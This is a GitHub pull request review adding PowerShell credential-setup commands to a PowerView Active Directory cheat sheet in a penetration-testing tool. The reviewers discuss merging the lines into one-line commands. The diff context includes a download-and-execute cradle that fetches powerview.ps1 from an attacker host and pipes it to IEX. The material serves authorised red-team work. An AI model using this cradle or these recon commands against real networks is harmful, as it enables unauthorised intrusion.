### PR TITLE
Added couple of commands to the powerview list and enchnced one of them

### PR DESCRIPTION
**Pull request by rumble773**
First contribution ever, hopes for many!

### CODE REVIEW

File: arsenal/data/cheats/Active_directory/powerview.md [hunk 1]
```diff
@@ -11,6 +11,16 @@ https://github.com/PowerShellMafia/PowerSploit/
 (new-object system.net.webclient).downloadstring('http://<lhost>/powerview.ps1') | IEX
 ```
 
+## Set alternative creds to use
+#plateform/windows #target/remote  #cat/RECON 
+Example : Use with commands as "-Credential $creds"
+
+```powershell
```
Comment (Guilhem7) [inline arsenal/data/cheats/Active_directory/powerview.md:18]: Hey, thanks for this pr too ! Arsenal does not support multiline command so I added semi-colon to concatenate each.

```powershell
$passwd = ConvertTo-SecureString "<password>" -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential ("<domain>\<user>", $passwd)
```
Can you replace the three lines by this one ? I also added double quotes for windows :D

**Review by Guilhem7 — CHANGES_REQUESTED** [review]

File: arsenal/data/cheats/Active_directory/powerview.md (hunk 1 above)
Comment (v1k1ngfr) [reply arsenal/data/cheats/Active_directory/powerview.md:18]: Hi @rumble773 ,

Sorry for the delay and thanks for your contribution !
Could you modify your PR with requested changes ?

Comment (rumble773) [reply arsenal/data/cheats/Active_directory/powerview.md:18]: Hi there @v1k1ngfr,
and thanks @Guilhem7 On it.

Comment (rumble773) [reply arsenal/data/cheats/Active_directory/powerview.md:18]: I made all the commits, not sure what to do now? should I make another pull request?

**Review by v1k1ngfr — APPROVED** [review]

**Pull request merged**